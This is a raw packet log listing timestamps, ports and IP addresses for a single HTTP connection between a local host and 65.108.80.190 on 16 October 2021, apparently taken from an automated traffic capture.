Oct 16, 2021 16:53:25.309798002 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309809923 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309822083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309837103 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309854031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309864998 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309876919 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309889078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309905052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309920073 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309931040 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309943914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309959888 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309969902 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309982061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309993982 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310013056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310030937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310046911 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310064077 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310081959 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310097933 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310113907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310126066 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310142040 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310157061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310169935 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310172081 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310184002 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310193062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310199976 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310199976 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310204983 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310209990 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310214996 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310216904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310219049 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310221910 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310225964 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310229063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310231924 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310234070 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310235023 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310239077 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310241938 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310245037 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310247898 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310249090 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310251951 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310255051 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310257912 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310261011 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310261965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310265064 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310277939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310287952 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310295105 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310306072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310317993 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310329914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310342073 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310358047 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310373068 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310388088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310388088 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310405016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310416937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310427904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310440063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310451984 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310463905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310482025 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310497999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310513973 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310516119 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310528994 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310530901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310538054 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310545921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310550928 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310554981 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310563087 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310569048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310570955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310579062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310585022 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310589075 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310601950 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310609102 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310617924 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310632944 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310645103 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310656071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310656071 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310671091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310684919 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310697079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310708046 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310712099 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310719013 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310726881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310728073 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310743093 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310751915 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310760021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310779095 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310781002 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310798883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310813904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310822010 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310828924 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310843945 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310844898 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310859919 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310864925 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310874939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310890913 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310909033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310909033 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310925961 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310931921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310940981 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310951948 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310956955 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310973883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.310975075 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.310987949 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.311002970 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.311013937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.311018944 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.311038017 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.311043978 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.311060905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.311077118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.311081886 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.311104059 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.311146975 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.347750902 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.347786903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.347826004 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.347842932 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.347872019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.347922087 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.347964048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.347997904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348015070 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348016977 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348033905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348042011 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348052025 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348061085 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348068953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348083973 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348087072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348104000 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348112106 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348120928 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348141909 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348154068 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348160982 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348177910 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348180056 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348196030 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348206997 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348242998 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348453999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348474026 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348490953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348507881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348512888 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348525047 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348541021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348550081 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348558903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348577023 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348579884 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348598003 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348607063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348618031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348628044 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348634958 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348651886 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348663092 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348669052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348685026 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348695993 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348702908 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348716021 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348718882 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348740101 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348747969 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348759890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348776102 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348783016 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348793030 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.348807096 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348831892 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.348850965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350213051 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350233078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350245953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350259066 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350276947 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350294113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350296021 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350315094 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350332022 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350342035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350354910 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350358963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350377083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350388050 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350394011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350410938 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350419998 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350430012 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350439072 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350447893 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350471020 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350472927 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350488901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350501060 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350507021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350523949 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350531101 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350541115 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350552082 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350558996 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350575924 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350589991 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350591898 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350604057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350620031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350631952 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350640059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350655079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350657940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350676060 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350687981 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350692034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350711107 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350727081 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350728035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350744963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350747108 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350761890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350776911 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350783110 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350801945 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350811958 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350819111 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350831985 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350836992 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350852966 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350862980 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350871086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350888014 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350908041 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350914001 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350919962 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350940943 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350953102 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350960016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350975990 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.350976944 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350994110 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.350997925 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351011038 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351023912 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351027966 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351046085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351058006 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351063967 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351084948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351089001 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351104975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351113081 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351138115 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351139069 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351161957 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351175070 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351185083 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351188898 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351202965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351216078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351217985 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351233959 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351252079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351264000 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351273060 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351281881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351294994 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351298094 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351309061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351320028 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351321936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351335049 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351345062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351352930 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351371050 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351372004 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351388931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351391077 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351407051 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351422071 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351424932 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351442099 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351457119 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351461887 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351475954 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351481915 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351499081 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351504087 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351512909 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351530075 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351536036 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351551056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351568937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351571083 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351587057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351602077 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351604939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351620913 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351623058 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351638079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351651907 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351655006 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351684093 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351690054 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351701975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351711035 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.351718903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.351733923 CEST	80	49737	65.108.80.190	192.168.2.7
